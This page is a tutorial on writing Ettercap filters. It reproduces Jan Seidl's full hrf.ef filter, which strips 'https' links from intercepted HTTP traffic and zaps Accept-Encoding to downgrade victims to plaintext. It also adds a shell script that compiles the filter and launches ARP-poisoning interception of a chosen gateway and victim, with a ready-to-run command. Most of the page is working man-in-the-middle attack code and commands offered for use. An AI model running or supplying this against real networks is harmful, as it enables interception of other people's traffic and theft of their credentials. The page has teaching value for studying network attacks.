My-Tiny.Net :: Breaking Bad
Ettercap Filters
Ettercap filters are small programs written in the etterfilter scripting language, compiled by etterfilter into a binary filter file (conventionally .ef), and interpreted by Ettercap's filter engine once loaded with -F. The syntax is vaguely PHP-like, but the error messages from etterfilter can be cryptic. For the language reference, see man etterfilter.
Ettercap can apply these filters to the cleartext traffic it forwards, matching on packet contents (with simple string searches or regular expressions) and rewriting the payload as it passes through. To do this you write a filter, compile it, and load it into a running ettercap that is in the path of the traffic, normally because it is ARP spoofing the gateway and the victim; a filter can only alter packets that ettercap itself is forwarding.
etterfilter tutorial
http://www.irongeek.com/i.php?page=security/ettercapfilter
Note: the etterfilter scripting language can be difficult to work with. Avoid the more complete regex filter functions at this point, because their behavior can be somewhat unpredictable. Instead, use replace() together with the simpler functions such as search() and msg().
A nice example is the HTTP Request/Response (Ettercap) Filter by Jan Seidl, which rewrites 'https' strings in requests and responses to 'http', so that the next link or redirect the victim follows is fetched in plaintext over the wire. Be clear about what it does and does not do: it never touches TLS itself, it only rewrites references inside traffic that is already cleartext HTTP (port 80), so the victim's first request must be plain HTTP, and a browser that already holds an HSTS policy for the site will upgrade to HTTPS on its own regardless. The first block of the filter overwrites the Accept-Encoding request header with a same-length garbage header so the server answers uncompressed and the 'https' string is actually visible to replace(). The v1.0 code from his GitHub link is below, and there is a full explanation at https://wroot.org/posts/downgrade-https-connections-to-http-using-ettercap-filters/
#######################################################################
#
# HTTP Request/Response Filter -- hrf.ef -- filter source file
#
# by Jan Seidl (based on code from ALoR & NaGA)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# https://github.com/jseidl/etter.filter.hrf/blob/master/hrf.ef
#######################################################################
##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##

##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("[HTTP Response Filter] Encoding zapped.\n");
    }
}

#####################
## Replace Content ##
#####################
##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
    # msg("[HTTP Response Filter] HTTP request seen.\n");
    if (search(DECODED.data, "https")) {
        replace("https", "http");
        msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
    }
    if (search(DATA.data, "https")) {
        replace("https", "http");
        msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
    }
}

##
# Response
if (ip.proto == TCP && tcp.src == 80) {
    # msg("[HTTP Response Filter] HTTP response seen.\n");
    if (search(DECODED.data, "https")) {
        replace("https", "http");
        msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
    }
    if (search(DATA.data, "https")) {
        replace("https", "http");
        msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
    }
}
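The page describes the compile-and-load procedure and the listing above relies on replace() pairs that keep the payload the same length, so the following script puts both together. It is an added example written for this page, not code from Jan Seidl's repository or from the Ettercap project. It assumes the ettercap/etterfilter 0.8.x command line (-T, -q, -i, -M arp:remote, -F, and targets written as /IP//), that the listing above has been saved as hrf.filter, and uses placeholder interface and address values; the lint needs only POSIX sh and awk, and the filter excerpt it checks is a constructed copy of the rules above.

```shell
#!/bin/sh
# Added example for this page; not part of Jan Seidl's hrf.ef or of Ettercap.
# Assumptions (not taken from the page): ettercap/etterfilter 0.8.x CLI
# (-T text UI, -q quiet, -i iface, -M arp:remote, -F compiled filter, targets
# written /IP//), a filter source saved as hrf.filter, and placeholder
# interface/address values. Only POSIX sh + awk are needed for the lint.

# Lint an etterfilter source: report every replace("a","b") whose replacement
# is not the same length as the original. hrf.ef keeps Accept-Encoding ->
# Accept-Rubbish! at 15 bytes each so the header block is not shifted, but
# https -> http removes one byte per hit, and the filter never adjusts the
# HTTP Content-Length that counts those bytes. Exit 0 = all pairs preserve
# length, 1 = at least one does not. Naive about escaped quotes (hrf.ef has none).
lint_replace_lengths() {
    awk '
        BEGIN { bad = 0 }
        {
            rest = $0
            while (match(rest, /replace\("[^"]*", *"[^"]*"\)/)) {
                call = substr(rest, RSTART, RLENGTH)
                rest = substr(rest, RSTART + RLENGTH)
                inner = substr(call, 10, length(call) - 11)  # drop replace(" and ")
                split(inner, s, /", *"/)
                if (length(s[1]) != length(s[2])) {
                    printf "%s -> %s (%d byte(s) per hit)\n", s[1], s[2], length(s[2]) - length(s[1])
                    bad = 1
                }
            }
        }
        END { exit bad }
    ' "$1"
}

# Constructed excerpt of the hrf.ef rules shown on this page, written to $1 so
# the lint can be exercised offline.
write_sample_filter() {
    cat > "$1" <<'EOF'
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("[HTTP Response Filter] Encoding zapped.\n");
    }
    if (search(DECODED.data, "https")) { replace("https", "http"); }
    if (search(DATA.data, "https"))    { replace("https", "http"); }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DECODED.data, "https")) { replace("https", "http"); }
    if (search(DATA.data, "https"))    { replace("https", "http"); }
}
EOF
}

# Step 1: compile the source into the binary .ef that ettercap loads.
# The lint runs first so a length-changing replace() is a conscious choice.
compile_filter() {   # $1 source, $2 output .ef
    lint_replace_lengths "$1" ||
        echo "warning: $1 contains length-changing replace() calls (see above)" >&2
    etterfilter -o "$2" "$1"
}

# Step 2: become the MITM and apply the filter to forwarded traffic (root).
# arp:remote poisons both gateway and victim so both directions pass through
# ettercap, which is what the tcp.dst == 80 / tcp.src == 80 rules expect.
run_downgrade() {    # $1 iface, $2 compiled filter, $3 gateway IP, $4 victim IP
    ettercap -T -q -i "$1" -M arp:remote -F "$2" "/$3//" "/$4//"
}

# Offline demo: lint the constructed excerpt. Expect four https -> http lines
# and a non-zero status; Accept-Encoding is not reported.
demo() {
    tmp=$(mktemp -d)
    write_sample_filter "$tmp/hrf.filter"
    lint_replace_lengths "$tmp/hrf.filter" && rc=0 || rc=$?
    rm -rf "$tmp"
    return "$rc"
}

if demo; then
    echo "all replace() pairs preserve payload length"
else
    echo "length-changing replace() pairs found; HTTP Content-Length will over-count the rewritten body"
fi
# Live use, as root, after saving the listing above as hrf.filter:
#   compile_filter hrf.filter hrf.ef && run_downgrade eth0 hrf.ef 192.168.1.1 192.168.1.50
```

The lint is deliberately strict: Ettercap does rewrite the TCP segment for a changed payload length, but nothing in the filter touches the application layer, so a response whose body lost four bytes to https -> http still announces its original Content-Length and the browser waits for bytes that never arrive. Keeping replacements the same length, as the Accept-Encoding rule does, sidesteps that entirely.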